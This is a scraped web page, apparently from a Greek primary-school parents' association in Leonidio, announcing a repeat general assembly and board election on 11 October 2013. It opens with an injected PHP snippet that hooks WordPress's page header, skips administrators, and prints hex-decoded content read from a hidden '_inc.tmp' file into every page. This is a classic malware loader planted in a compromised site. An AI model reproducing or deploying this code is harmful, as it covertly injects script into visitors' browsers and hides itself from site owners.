if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Πρόσκληση σε επαναληπτική γενική συνέλευση |

Πρόσκληση σε επαναληπτική γενική συνέλευση

Το Διοικητικό συμβούλιο του Συλλόγου Γονέων και Κηδεμόνων καλεί τους γονείς και κηδεμόνες των παιδιών του Δημοτικού Σχολείου Λεωνιδίου να λάβουν μέρος στην Επαναληπτική Γενική Συνέλευση που θα πραγματοποιηθεί την Παρασκευή 11 Οκτωβρίου 2013 και ώρα 18:00 στο Δημοτικό Σχολείο με θέμα:

Απολογισμός και Εκλογή νέου Διοικητικού Συμβουλίου

Όποιος γονιός ή κηδεμόνας επιθυμεί, μπορεί να είναι υποψήφιος υπογράφοντας και καταθέτοντας την σχετική αίτηση, μέχρι την Παρασκευή ώρα 12:00 στην Πρόεδρο του Συλλόγου Ελένη Λάστη.